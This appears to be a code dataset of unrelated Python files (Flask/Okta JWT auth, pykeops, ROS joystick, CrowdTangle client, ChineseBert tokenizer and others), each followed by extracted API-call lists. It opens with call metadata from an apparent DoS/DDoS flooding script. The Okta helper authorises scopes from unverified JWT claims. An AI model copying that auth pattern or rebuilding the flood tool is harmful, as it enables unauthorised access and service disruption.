] | [((124, 173), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (137, 173), False, 'import socket\n'), ((331, 342), 'time.time', 'time.time', ([], {}), '()\n', (340, 342), False, 'import time\n'), ((660, 682), 'random._urandom', 'random._urandom', (['(10240)'], {}), '(10240)\n', (675, 682), False, 'import os, sys, random\n'), ((495, 543), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (508, 543), False, 'import socket\n'), ((587, 636), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (600, 636), False, 'import socket\n'), ((1194, 1236), 'threading.Thread', 'threading.Thread', ([], {'target': 'dos', 'args': '[*args]'}), '(target=dos, args=[*args])\n', (1210, 1236), False, 'import threading\n'), ((1663, 1703), 'threading.Thread', 'threading.Thread', ([], {'target': 'ddos', 'args': 'data'}), '(target=ddos, args=data)\n', (1679, 1703), False, 'import threading\n'), ((1068, 1079), 'time.time', 'time.time', ([], {}), '()\n', (1077, 1079), False, 'import time\n')] |
from functools import wraps
from base64 import b64encode
from jose import jwt
from flask import Flask, jsonify, request, _app_ctx_stack, json
import requests
ALGORITHMS = ["RS256"]
SCOPES = 'username' # Custom scopes that you want to pass as part of the request when requesting access token
AUTH_SERVER_ID = 'YOUR_OKTA_AUTH_SERVER_ID' # Replace with your okta authroziation server id
AUTH_SERVER_DOMAIN = 'YOUR_OKTA_DOMAIN' # Replace with your okta org
AUTH_DOMAIN_ENDPOINT = '{}/oauth2/{}'.format(AUTH_SERVER_DOMAIN, AUTH_SERVER_ID)
API_AUDIENCE = 'http://localhost:5000/' # whatever your API domain is called and should be added as audience to the API
def handle_error(error, status_code):
resp = jsonify(error)
resp.status_code = status_code
return resp
def get_access_token(url, headers, data):
r = requests.post(url, headers=headers, data=data)
return r
def get_token_auth_header():
"""Obtains the access token from the Authorization Header
"""
auth = request.headers.get("Authorization", None)
if not auth:
return handle_error({"code": "authorization_header_missing",
"description":
"Authorization header is expected"}, 401)
parts = auth.split()
if parts[0].lower() != "bearer":
return handle_error({"code": "invalid_header",
"description":
"Authorization header must start with"
"Bearer"}, 401)
elif len(parts) == 1:
return handle_error({"code": "invalid_header",
"description": "Token not found"}, 401)
elif len(parts) > 2:
return handle_error({"code": "invalid_header",
"description": "Authorization header must be"
"Bearer token"}, 401)
token = parts[1]
return token
def requires_scope(required_scope):
"""Determines if the required scope is present in the access token
Args:
required_scope (str): The scope required to access the resource
"""
token = get_token_auth_header()
unverified_claims = jwt.get_unverified_claims(token)
token_scopes = unverified_claims["scp"]
for token_scope in token_scopes:
if token_scope == required_scope:
return True
return False
def requires_auth(f):
"""Determines if the access token is valid
"""
@wraps(f)
def decorated(*args, **kwargs):
token = get_token_auth_header()
jsonurl = requests.get("{}/v1/keys".format(AUTH_DOMAIN_ENDPOINT))
jwks = jsonurl.json()
try:
unverified_header = jwt.get_unverified_header(token)
except jwt.JWTError:
return token
rsa_key = {}
for key in jwks["keys"]:
if key["kid"] == unverified_header["kid"]:
rsa_key = {
"kty": key["kty"],
"kid": key["kid"],
"use": key["use"],
"n": key["n"],
"e": key["e"]
}
if rsa_key:
try:
payload = jwt.decode(
token,
rsa_key,
algorithms=ALGORITHMS,
audience=API_AUDIENCE,
issuer=AUTH_DOMAIN_ENDPOINT
)
except jwt.ExpiredSignatureError:
return handle_error({"code": "token_expired",
"description": "token is expired"}, 401)
except jwt.JWTClaimsError:
return handle_error({"code": "invalid_claims",
"description": "incorrect claims,"
"please check the audience and issuer"}, 401)
except Exception:
return handle_error({"code": "invalid_header",
"description": "Unable to parse authentication"
"token."}, 400)
_app_ctx_stack.top.current_user = payload
return f(*args, **kwargs)
return handle_error({"code": "invalid_header",
"description": "Unable to find appropriate key"}, 400)
return decorated
def generate_basic_auth(cred_dict):
"""Builds Basic auth header
"""
username = cred_dict.get('client_id')
password = cred_dict.get('client_secret')
if not (username and password):
return None
basic_auth = b64encode(bytes('{}:{}'.format(username, password))).decode('ascii')
return {'Accept': 'application/json',
'content-type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic ' + basic_auth }
def get_oauth_body_client_credentials():
payload = "grant_type=client_credentials&scope={}".format(SCOPES)
return payload
def get_oauth_body_password(cred_dict):
payload = "grant_type=password&username={}&password={}&scope={}".format(cred_dict.get('username', ''), cred_dict.get('password', ''), SCOPES)
return payload | [
"requests.post",
"jose.jwt.decode",
"functools.wraps",
"jose.jwt.get_unverified_claims",
"jose.jwt.get_unverified_header",
"flask.request.headers.get",
"flask.jsonify"
] | [((705, 719), 'flask.jsonify', 'jsonify', (['error'], {}), '(error)\n', (712, 719), False, 'from flask import Flask, jsonify, request, _app_ctx_stack, json\n'), ((822, 868), 'requests.post', 'requests.post', (['url'], {'headers': 'headers', 'data': 'data'}), '(url, headers=headers, data=data)\n', (835, 868), False, 'import requests\n'), ((993, 1035), 'flask.request.headers.get', 'request.headers.get', (['"""Authorization"""', 'None'], {}), "('Authorization', None)\n", (1012, 1035), False, 'from flask import Flask, jsonify, request, _app_ctx_stack, json\n'), ((2193, 2225), 'jose.jwt.get_unverified_claims', 'jwt.get_unverified_claims', (['token'], {}), '(token)\n', (2218, 2225), False, 'from jose import jwt\n'), ((2473, 2481), 'functools.wraps', 'wraps', (['f'], {}), '(f)\n', (2478, 2481), False, 'from functools import wraps\n'), ((2707, 2739), 'jose.jwt.get_unverified_header', 'jwt.get_unverified_header', (['token'], {}), '(token)\n', (2732, 2739), False, 'from jose import jwt\n'), ((3198, 3303), 'jose.jwt.decode', 'jwt.decode', (['token', 'rsa_key'], {'algorithms': 'ALGORITHMS', 'audience': 'API_AUDIENCE', 'issuer': 'AUTH_DOMAIN_ENDPOINT'}), '(token, rsa_key, algorithms=ALGORITHMS, audience=API_AUDIENCE,\n issuer=AUTH_DOMAIN_ENDPOINT)\n', (3208, 3303), False, 'from jose import jwt\n')] |
from app import create_app, db
app = create_app()
@app.shell_context_processor
def make_shell_context():
return {'app': app, 'db': db}
| [
"app.create_app"
] | [((38, 50), 'app.create_app', 'create_app', ([], {}), '()\n', (48, 50), False, 'from app import create_app, db\n')] |
import numpy as np
from pykeops.common.lazy_tensor import GenericLazyTensor
from pykeops.numpy.utils import numpytools
# Convenient aliases:
def Var(x_or_ind, dim=None, cat=None):
if dim is None:
# init via data: we assume x_or_ind is data
return LazyTensor(x_or_ind, axis=cat)
else:
# init via symbolic variable given as triplet (ind,dim,cat)
return LazyTensor((x_or_ind, dim, cat))
def Vi(x_or_ind, dim=None):
r"""
Simple wrapper that return an instantiation of :class:`LazyTensor` of type 0.
"""
return Var(x_or_ind, dim, 0)
def Vj(x_or_ind, dim=None):
r"""
Simple wrapper that return an instantiation of :class:`LazyTensor` of type 1.
"""
return Var(x_or_ind, dim, 1)
def Pm(x_or_ind, dim=None):
r"""
Simple wrapper that return an instantiation of :class:`LazyTensor` of type 2.
"""
return Var(x_or_ind, dim, 2)
class LazyTensor(GenericLazyTensor):
r"""Symbolic wrapper for NumPy arrays.
:class:`LazyTensor` encode numerical arrays through the combination
of a symbolic, **mathematical formula** and a list of **small data arrays**.
They can be used to implement efficient algorithms on objects
that are **easy to define**, but **impossible to store** in memory
(e.g. the matrix of pairwise distances between
two large point clouds).
:class:`LazyTensor` may be created from standard NumPy arrays or PyTorch tensors,
combined using simple mathematical operations and converted
back to NumPy arrays or PyTorch tensors with
efficient reduction routines, which outperform
standard tensorized implementations by two orders of magnitude.
"""
def __init__(self, x=None, axis=None):
super().__init__(x=x, axis=axis)
# numpy specialization
typex = type(x)
if (
typex
not in [type(None), tuple, int, float, list, np.ndarray] + self.float_types
):
raise TypeError(
"LazyTensors should be built from NumPy arrays, "
"float/integer numbers, lists of floats or 3-uples of "
"integers. Received: {}".format(typex)
)
if typex in self.float_types: # NumPy scalar -> NumPy array
x = np.array(x).reshape(1)
if typex == np.ndarray:
self.infer_dim(x, axis)
def get_tools(self):
self.tools = numpytools
self.Genred = numpytools.Genred
self.KernelSolve = numpytools.KernelSolve
def lt_constructor(self, x=None, axis=None):
return LazyTensor(x=x, axis=axis)
float_types = [float, np.float16, np.float32, np.float64]
| [
"numpy.array"
] | [((2288, 2299), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (2296, 2299), True, 'import numpy as np\n')] |
from django.contrib import admin
from .models import ColorAlias
admin.site.register(ColorAlias)
| [
"django.contrib.admin.site.register"
] | [((66, 97), 'django.contrib.admin.site.register', 'admin.site.register', (['ColorAlias'], {}), '(ColorAlias)\n', (85, 97), False, 'from django.contrib import admin\n')] |
#! /usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
schema object
schema
"""
__author__ = '<NAME> <<EMAIL>>'
__version__ = '1.0.0'
__date__ = '2019-12-02'
import graphene
from app.gql.query import Query
from app.gql.mutation import Mutation
schema = graphene.Schema(query=Query, mutation=Mutation)
| [
"graphene.Schema"
] | [((253, 300), 'graphene.Schema', 'graphene.Schema', ([], {'query': 'Query', 'mutation': 'Mutation'}), '(query=Query, mutation=Mutation)\n', (268, 300), False, 'import graphene\n')] |
# -*- coding: utf-8 -*-
"""
@contact: <EMAIL>
@time: 2019/3/25 下午9:43
"""
import asyncio
async def consume():
print('start consume...')
await asyncio.sleep(10)
print('end consume...')
if __name__ == '__main__':
tasks = [consume() for i in range(10)]
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(asyncio.wait(tasks))
except KeyboardInterrupt as e:
all = asyncio.Task.all_tasks()
for t in all:
print('cancel task')
print(t.cancel())
loop.stop()
loop.run_forever()
finally:
loop.close()
"""
lishulongdeMBP:event_loop lishulong$ python cancel_task.py
start consume...
start consume...
start consume...
start consume...
start consume...
start consume...
start consume...
start consume...
start consume...
start consume...
^Ccancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
lishulongdeMBP:event_loop lishulong$
"""
| [
"asyncio.Task.all_tasks",
"asyncio.get_event_loop",
"asyncio.wait",
"asyncio.sleep"
] | [((284, 308), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (306, 308), False, 'import asyncio\n'), ((154, 171), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (167, 171), False, 'import asyncio\n'), ((350, 369), 'asyncio.wait', 'asyncio.wait', (['tasks'], {}), '(tasks)\n', (362, 369), False, 'import asyncio\n'), ((420, 444), 'asyncio.Task.all_tasks', 'asyncio.Task.all_tasks', ([], {}), '()\n', (442, 444), False, 'import asyncio\n')] |
#!/usr/bin/env python
import rospy
import socket
import math
from std_msgs.msg import String
from std_msgs.msg import Time
from std_msgs.msg import UInt8
from std_msgs.msg import UInt32
from sensor_msgs.msg import Joy
from consai_msgs.msg import robot_commands
import topic_tools.srv
# import ssl_refbox.msg
class Buttons():
"""docstring for JoyInput"""
def __init__(self, ):
self.old_input = int()
self.now_input = int()
def refresh(self, buttons):
self.old_input = self.now_input
self.now_input = buttons
def isPushed(self, num):
if self.now_input[num] == 1:
return True
else:
return False
def isEdgeOn(self, num):
if self.now_input[num] == 1 and self.old_input[num] == 0:
return True
else:
return False
def isEdgeOff(self, num):
if self.now_input[num] == 0 and self.old_input[num] == 1:
return True
else:
return False
# class Referee():
#
# """docstring for Referee"""
#
# def __init__(self):
# self.refbox_msg = ssl_refbox.msg.SSLReferee()
# self.pub = rospy.Publisher(
# '~refbox', ssl_refbox.msg.SSLReferee, queue_size=10)
#
# self.halt_button = rospy.get_param('~halt_button')
# self.start_button = rospy.get_param('~start_button')
# self.stopgame_button = rospy.get_param('~stopgame_button')
# self.force_start_button = rospy.get_param('~force_start_button')
#
# def publish(self, command):
# msg = ssl_refbox.msg.SSLReferee()
# msg.stage = 'NORMAL_FIRST_HALF_PRE'
# msg.command = command
#
# self.pub.publish(msg)
class RobotCommand():
"""docstring for RobotCommand"""
def __init__(self):
self.pub = rospy.Publisher(
'~robot_commands', robot_commands, queue_size=10)
self.surge_axis = rospy.get_param('~surge_axis')
self.sway_axis = rospy.get_param('~sway_axis')
self.turn_l_axis = rospy.get_param('~turn_l_axis')
self.turn_r_axis = rospy.get_param('~turn_r_axis')
self.kick_x_button = rospy.get_param('~kick_x_button')
self.kick_z_button = rospy.get_param('~kick_z_button')
self.dribble_button = rospy.get_param('~dribble_button')
self.turbo_button = rospy.get_param('~turbo_button')
self.select_button = rospy.get_param('~select_button')
self.holonomic = True
def publish(self, joy):
commands = robot_commands()
if buttons.isEdgeOn(self.select_button) == True:
self.holonomic = not self.holonomic
if self.holonomic == True:
rospy.loginfo('Change controller mode : holonomic')
else:
rospy.loginfo('Change controller mode : NON-holonomic')
if joy.buttons[self.turbo_button] == 0:
vel_scale = 1
else:
vel_scale = 3
if self.holonomic == True:
commands.vel_surge = joy.axes[self.surge_axis] * vel_scale
commands.vel_sway = 0.0
commands.omega = joy.axes[self.sway_axis] * 1.5 * vel_scale
else:
commands.vel_surge = joy.axes[self.surge_axis] * vel_scale
commands.vel_sway = joy.axes[self.sway_axis] * vel_scale
omega = -joy.axes[self.turn_l_axis] + joy.axes[self.turn_r_axis]
commands.omega = omega * 1.5 * vel_scale
if joy.buttons[self.kick_x_button] == 1:
commands.kick_speed_x = 3
commands.kick_speed_z = 0
elif joy.buttons[self.kick_z_button] == 1:
commands.kick_speed_x = 3
commands.kick_speed_z = 3
else:
commands.kick_speed_x = 0
commands.kick_speed_z = 0
if joy.buttons[self.dribble_button] == 1:
commands.dribble_power = 1
else:
commands.dribble_power = 0
self.pub.publish(commands)
def receiveJoy(joy):
buttons.refresh(joy.buttons)
# referee.publish(joy)
commands.publish(joy)
if __name__ == '__main__':
rospy.init_node('joystick_node')
# class inistantinate
buttons = Buttons()
# referee = Referee()
commands = RobotCommand()
# get parameters
friend_color = rospy.get_param('friend_color')
# Define Subscriber
rospy.Subscriber("joy", Joy, receiveJoy)
rospy.spin()
| [
"rospy.Subscriber",
"rospy.init_node",
"rospy.get_param",
"rospy.spin",
"consai_msgs.msg.robot_commands",
"rospy.Publisher",
"rospy.loginfo"
] | [((4137, 4169), 'rospy.init_node', 'rospy.init_node', (['"""joystick_node"""'], {}), "('joystick_node')\n", (4152, 4169), False, 'import rospy\n'), ((4318, 4349), 'rospy.get_param', 'rospy.get_param', (['"""friend_color"""'], {}), "('friend_color')\n", (4333, 4349), False, 'import rospy\n'), ((4379, 4419), 'rospy.Subscriber', 'rospy.Subscriber', (['"""joy"""', 'Joy', 'receiveJoy'], {}), "('joy', Joy, receiveJoy)\n", (4395, 4419), False, 'import rospy\n'), ((4424, 4436), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (4434, 4436), False, 'import rospy\n'), ((1821, 1886), 'rospy.Publisher', 'rospy.Publisher', (['"""~robot_commands"""', 'robot_commands'], {'queue_size': '(10)'}), "('~robot_commands', robot_commands, queue_size=10)\n", (1836, 1886), False, 'import rospy\n'), ((1927, 1957), 'rospy.get_param', 'rospy.get_param', (['"""~surge_axis"""'], {}), "('~surge_axis')\n", (1942, 1957), False, 'import rospy\n'), ((1983, 2012), 'rospy.get_param', 'rospy.get_param', (['"""~sway_axis"""'], {}), "('~sway_axis')\n", (1998, 2012), False, 'import rospy\n'), ((2043, 2074), 'rospy.get_param', 'rospy.get_param', (['"""~turn_l_axis"""'], {}), "('~turn_l_axis')\n", (2058, 2074), False, 'import rospy\n'), ((2105, 2136), 'rospy.get_param', 'rospy.get_param', (['"""~turn_r_axis"""'], {}), "('~turn_r_axis')\n", (2120, 2136), False, 'import rospy\n'), ((2166, 2199), 'rospy.get_param', 'rospy.get_param', (['"""~kick_x_button"""'], {}), "('~kick_x_button')\n", (2181, 2199), False, 'import rospy\n'), ((2229, 2262), 'rospy.get_param', 'rospy.get_param', (['"""~kick_z_button"""'], {}), "('~kick_z_button')\n", (2244, 2262), False, 'import rospy\n'), ((2293, 2327), 'rospy.get_param', 'rospy.get_param', (['"""~dribble_button"""'], {}), "('~dribble_button')\n", (2308, 2327), False, 'import rospy\n'), ((2356, 2388), 'rospy.get_param', 'rospy.get_param', (['"""~turbo_button"""'], {}), "('~turbo_button')\n", (2371, 2388), False, 'import rospy\n'), ((2418, 2451), 'rospy.get_param', 'rospy.get_param', (['"""~select_button"""'], {}), "('~select_button')\n", (2433, 2451), False, 'import rospy\n'), ((2531, 2547), 'consai_msgs.msg.robot_commands', 'robot_commands', ([], {}), '()\n', (2545, 2547), False, 'from consai_msgs.msg import robot_commands\n'), ((2710, 2761), 'rospy.loginfo', 'rospy.loginfo', (['"""Change controller mode : holonomic"""'], {}), "('Change controller mode : holonomic')\n", (2723, 2761), False, 'import rospy\n'), ((2796, 2851), 'rospy.loginfo', 'rospy.loginfo', (['"""Change controller mode : NON-holonomic"""'], {}), "('Change controller mode : NON-holonomic')\n", (2809, 2851), False, 'import rospy\n')] |
import random
import requests
import time
class Crowdtangle:
def __init__(self,api_tokens=[]):
self.api_tokens = api_tokens
self.apiBaseUrl = "https://api.crowdtangle.com/ce/"
self.chromeAppVersion = "3.0.3"
self.userAgent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
def _requestAPI(self,requestUrl, params, link):
headers = ({'User-Agent': self.userAgent,\
'Accept': 'application/json, text/javascript, */*; q=0.01',\
'Sec-Fetch-Mode': 'cors'})
params['link'] = link
result = requests.get(requestUrl, params = params, headers=headers)
return result
def _getReferalSection(self,url):
requestUrl = self.apiBaseUrl + "links"
referalParams = {
"token": random.choice(self.api_tokens),"version": self.chromeAppVersion}
result = self._requestAPI(requestUrl, referalParams, url)
if(result.status_code == 500):
print("ERROR 500:")
print(result.headers)
result = self._requestAPI(requestUrl, referalParams, url)
if(result.status_code == 500):
print("ERROR 500:")
print(result.headers)
return result.json()
def get_url_referals(self,url,wait=15):
time.sleep(wait)
data = self._getReferalSection(url)
if "error" not in data and 'result' in data:
l = []
data['result']['posts']['posts'].sort(key = lambda x:x['post_date']) #sort datetime
for post in data['result']['posts']['posts']:
post["link_id"]=url
l.append(post)
else:
print("No referal data :(, link : " +str(url))
return l
| [
"random.choice",
"time.sleep",
"requests.get"
] | [((628, 684), 'requests.get', 'requests.get', (['requestUrl'], {'params': 'params', 'headers': 'headers'}), '(requestUrl, params=params, headers=headers)\n', (640, 684), False, 'import requests\n'), ((1350, 1366), 'time.sleep', 'time.sleep', (['wait'], {}), '(wait)\n', (1360, 1366), False, 'import time\n'), ((842, 872), 'random.choice', 'random.choice', (['self.api_tokens'], {}), '(self.api_tokens)\n', (855, 872), False, 'import random\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
# see: https://en.wikipedia.org/wiki/ISO_3166-2:IR
PROVINCE_MAP = {
u'آذربایجان شرقی': 1,
u'آذربایجان غربی': 2,
u'اردبیل': 3,
u'اصفهان': 4,
u'ایلام': 5,
u'بوشهر': 6,
u'تهران': 7,
u'چهار محال و بختیاری': 8,
u'خوزستان': 10,
u'زنجان': 11,
u'سمنان': 12,
u'سیستان و بلوچستان': 13,
u'فارس': 14,
u'کرمان': 15,
u'کردستان': 16,
u'کرمانشاه': 17,
u'کهگیلویه و بویراحمد': 18,
u'گیلان': 19,
u'لرستان': 20,
u'مازندران': 21,
u'مرکزی': 22,
u'هرمزگان': 23,
u'همدان': 24,
u'یزد': 25,
u'قم': 26,
u'گلستان': 27,
u'قزوین': 28,
u'خراسان جنوبی': 29,
u'خراسان رضوی': 30,
u'خراسان شمالی': 31,
u'البرز': 32,
}
def get_province_id(name):
"""return province id by its name"""
if name in PROVINCE_MAP:
return PROVINCE_MAP[name]
else:
return 0
with open('./iran/dist/iran.json') as opened:
iran = json.load(opened)
data = {}
for city in iran:
pid = get_province_id(city['province_name']);
if pid > 0:
if not pid in data.keys():
data[pid] = []
data[pid].append(city['city_name'])
for pid in data.keys():
with open('./dist/' + str(pid) + '.json', 'w', encoding='utf8') as out:
json.dump(data[pid], out, ensure_ascii=False)
| [
"json.load",
"json.dump"
] | [((987, 1004), 'json.load', 'json.load', (['opened'], {}), '(opened)\n', (996, 1004), False, 'import json\n'), ((1316, 1361), 'json.dump', 'json.dump', (['data[pid]', 'out'], {'ensure_ascii': '(False)'}), '(data[pid], out, ensure_ascii=False)\n', (1325, 1361), False, 'import json\n')] |
from sanic import Sanic
from sanic.response import json, text
from sanic_graphql import GraphQLView
from api import schema, setup
app = Sanic()
@app.route("/")
async def root(request):
return text("Welcome! Call me via POST with graphql query in body.")
@app.route("/", methods=['POST'])
async def post_root(request):
result = schema.execute(request.json['query'])
return json(result.data)
app.add_route(GraphQLView.as_view(schema=schema, graphiql=True), '/graphql')
if __name__ == "__main__":
setup()
app.run(host="0.0.0.0", port=4000)
| [
"api.setup",
"api.schema.execute",
"sanic.response.json",
"sanic.Sanic",
"sanic_graphql.GraphQLView.as_view",
"sanic.response.text"
] | [((138, 145), 'sanic.Sanic', 'Sanic', ([], {}), '()\n', (143, 145), False, 'from sanic import Sanic\n'), ((199, 260), 'sanic.response.text', 'text', (['"""Welcome! Call me via POST with graphql query in body."""'], {}), "('Welcome! Call me via POST with graphql query in body.')\n", (203, 260), False, 'from sanic.response import json, text\n'), ((340, 377), 'api.schema.execute', 'schema.execute', (["request.json['query']"], {}), "(request.json['query'])\n", (354, 377), False, 'from api import schema, setup\n'), ((389, 406), 'sanic.response.json', 'json', (['result.data'], {}), '(result.data)\n', (393, 406), False, 'from sanic.response import json, text\n'), ((423, 472), 'sanic_graphql.GraphQLView.as_view', 'GraphQLView.as_view', ([], {'schema': 'schema', 'graphiql': '(True)'}), '(schema=schema, graphiql=True)\n', (442, 472), False, 'from sanic_graphql import GraphQLView\n'), ((518, 525), 'api.setup', 'setup', ([], {}), '()\n', (523, 525), False, 'from api import schema, setup\n')] |
from rest_framework import viewsets, permissions, serializers
from rest_framework.response import Response
from iaso.models import MatchingAlgorithm
from .common import HasPermission
class AlgorithmsSerializer(serializers.ModelSerializer):
class Meta:
model = MatchingAlgorithm
fields = ["id", "name", "description", "created_at"]
read_only_fields = ["created_at"]
class AlgorithmsViewSet(viewsets.ModelViewSet):
"""Algorithms API
This API is restricted to authenticated users having the "menupermissions.iaso_links" permission
GET /api/algorithms/
"""
permission_classes = [permissions.IsAuthenticated]
serializer_class = AlgorithmsSerializer
http_method_names = ["get", "post", "put", "head", "options", "trace", "delete"]
def get_queryset(self):
algos = MatchingAlgorithm.objects.all()
return algos.order_by("id")
| [
"iaso.models.MatchingAlgorithm.objects.all"
] | [((835, 866), 'iaso.models.MatchingAlgorithm.objects.all', 'MatchingAlgorithm.objects.all', ([], {}), '()\n', (864, 866), False, 'from iaso.models import MatchingAlgorithm\n')] |
# SPDX-License-Identifier: MIT
# Copyright (c) 2020 The Pybricks Authors
"""
Hardware Module: 1
Description: This tests the lights on the Ultrasonic Sensor. No external
sensors are used to verify that it works.
"""
from pybricks.pupdevices import UltrasonicSensor
from pybricks.parameters import Port
from pybricks.tools import wait
from urandom import randint
# Initialize devices.
lights = UltrasonicSensor(Port.C).lights
# Turn on all lights at full brightness.
lights.on()
wait(500)
# Turn on all lights.
for i in range(-50, 150, 2):
lights.on(i)
wait(20)
# Turn of all lights.
lights.off()
wait(500)
# Turn on all lights.
for i in range(50):
lights.on([randint(0, 100) for j in range(4)])
wait(50)
| [
"pybricks.tools.wait",
"pybricks.pupdevices.UltrasonicSensor",
"urandom.randint"
] | [((482, 491), 'pybricks.tools.wait', 'wait', (['(500)'], {}), '(500)\n', (486, 491), False, 'from pybricks.tools import wait\n'), ((610, 619), 'pybricks.tools.wait', 'wait', (['(500)'], {}), '(500)\n', (614, 619), False, 'from pybricks.tools import wait\n'), ((396, 420), 'pybricks.pupdevices.UltrasonicSensor', 'UltrasonicSensor', (['Port.C'], {}), '(Port.C)\n', (412, 420), False, 'from pybricks.pupdevices import UltrasonicSensor\n'), ((565, 573), 'pybricks.tools.wait', 'wait', (['(20)'], {}), '(20)\n', (569, 573), False, 'from pybricks.tools import wait\n'), ((718, 726), 'pybricks.tools.wait', 'wait', (['(50)'], {}), '(50)\n', (722, 726), False, 'from pybricks.tools import wait\n'), ((678, 693), 'urandom.randint', 'randint', (['(0)', '(100)'], {}), '(0, 100)\n', (685, 693), False, 'from urandom import randint\n')] |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : tokenzier.py
@Time : 2021/09/11 16:00:04
@Author : <NAME>
@Version : 1.0
@Contact : <EMAIL>
@Desc : None
'''
import json
import os
from typing import List
import numpy as np
from pypinyin import Style, pinyin
from .. import BasicTokenizer, PretrainedTokenizer, WordpieceTokenizer
__all__ = ['ChineseBertTokenizer']
class ChineseBertTokenizer(PretrainedTokenizer):
resource_files_names = {"vocab_file": "vocab.txt"} # for save_pretrained
pretrained_resource_files_map = {}
pretrained_init_configuration = {}
padding_side = 'right'
def __init__(self,
bert_path,
max_seq_len=512,
do_lower_case=True,
unk_token="[UNK]",
sep_token="[SEP]",
pad_token="[PAD]",
cls_token="[CLS]",
mask_token="[MASK]"):
vocab_file = os.path.join(bert_path, 'vocab.txt')
config_path = os.path.join(bert_path, 'config')
if not os.path.isfile(vocab_file):
raise ValueError(
"Can't find a vocabulary file at path '{}'. To load the "
"vocabulary from a pretrained model please use "
"`tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`"
.format(vocab_file))
self.vocab = self.load_vocabulary(vocab_file, unk_token=unk_token)
self.max_seq_len = max_seq_len
# load pinyin map dict
with open(os.path.join(config_path, 'pinyin_map.json'),
encoding='utf8') as fin:
self.pinyin_dict = json.load(fin)
# load char id map tensor
with open(os.path.join(config_path, 'id2pinyin.json'),
encoding='utf8') as fin:
self.id2pinyin = json.load(fin)
# load pinyin map tensor
with open(os.path.join(config_path, 'pinyin2tensor.json'),
encoding='utf8') as fin:
self.pinyin2tensor = json.load(fin)
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab,
unk_token=unk_token)
def tokenize_sentence(self, sentence):
# convert sentence to ids
tokenizer_output = self.encode(sentence)
input_ids = tokenizer_output['input_ids']
pinyin_ids = self.convert_sentence_to_pinyin_ids(sentence)
# assert,token nums should be same as pinyin token nums
# assert len(input_ids) <= self.max_seq_len
# assert len(input_ids) == len(pinyin_ids)
# convert list to tensor
# input_ids = paddle.to_tensor(input_ids)
# pinyin_ids = paddle.to_tensor(pinyin_ids).reshape([-1])
# convert list to np.array
input_ids = np.array(input_ids)
pinyin_ids = np.array(pinyin_ids).reshape([-1, 8])
return {"input_ids": input_ids, "pinyin_ids": pinyin_ids}
def convert_sentence_to_pinyin_ids(self, sentence: str, with_specail_token=True) -> List[List[int]]:
# get offsets
bert_tokens_offsets = self.get_offset_mapping(sentence)
if with_specail_token:
bert_tokens_offsets.insert(0, (0, 0))
bert_tokens_offsets.append((0, 0))
# get tokens
bert_tokens_tokens = self.tokenize(sentence)
if with_specail_token:
bert_tokens_tokens.insert(0, '[CLS]')
bert_tokens_tokens.append('[SEP]')
# get pinyin of a sentence
pinyin_list = pinyin(sentence,
style=Style.TONE3,
heteronym=True,
errors=lambda x: [['not chinese'] for _ in x])
pinyin_locs = {}
# get pinyin of each location
for index, item in enumerate(pinyin_list):
pinyin_string = item[0]
# not a Chinese character, pass
if pinyin_string == "not chinese":
continue
if pinyin_string in self.pinyin2tensor:
pinyin_locs[index] = self.pinyin2tensor[pinyin_string]
else:
ids = [0] * 8
for i, p in enumerate(pinyin_string):
if p not in self.pinyin_dict["char2idx"]:
ids = [0] * 8
break
ids[i] = self.pinyin_dict["char2idx"][p]
pinyin_locs[index] = ids
# find chinese character location, and generate pinyin ids
pinyin_ids = []
for idx, (token, offset) in enumerate(
zip(bert_tokens_tokens, bert_tokens_offsets)):
if offset[1] - offset[0] != 1:
# 非单个字的token,以及 [CLS] [SEP] 特殊 token
pinyin_ids.append([0] * 8)
continue
if offset[0] in pinyin_locs:
# 单个字为token且有拼音tensor
pinyin_ids.append(pinyin_locs[offset[0]])
else:
# 单个字为token但无拼音tensor
pinyin_ids.append([0] * 8)
return pinyin_ids
def convert_tokens_to_pinyin_ids(self,
tokens: List[str]) -> List[List[int]]:
"""
Example :
tokens: ['[CLS]', '你', '多', '大', '了', '?', '[SEP]', '我', '10', '岁', '了', '。', '[SEP]']
"""
pinyin_ids = []
for token in tokens:
if token == '[CLS]' or token == '[SEP]':
# [CLS]、[SEP] 的 token
pinyin_ids.append([0] * 8)
continue
offset = self.get_offset_mapping(token)[0]
if offset[1] - offset[0] != 1:
# 非单个字组成的 token
pinyin_ids.append([0] * 8)
continue
pinyin_string = pinyin(token,
style=Style.TONE3,
heteronym=True,
errors=lambda x: [['not chinese']
for _ in x])[0][0]
if pinyin_string == "not chinese":
# 不是中文
pinyin_ids.append([0] * 8)
else:
if pinyin_string in self.pinyin2tensor:
pinyin_ids.append(self.pinyin2tensor[pinyin_string])
else:
ids = [0] * 8
for i, p in enumerate(pinyin_string):
if p not in self.pinyin_dict["char2idx"]:
ids = [0] * 8
break
ids[i] = self.pinyin_dict["char2idx"][p]
pinyin_ids.append(ids)
return pinyin_ids
@property
def vocab_size(self):
"""
Return the size of vocabulary.
Returns:
int: The size of vocabulary.
"""
return len(self.vocab)
def _tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def tokenize(self, text):
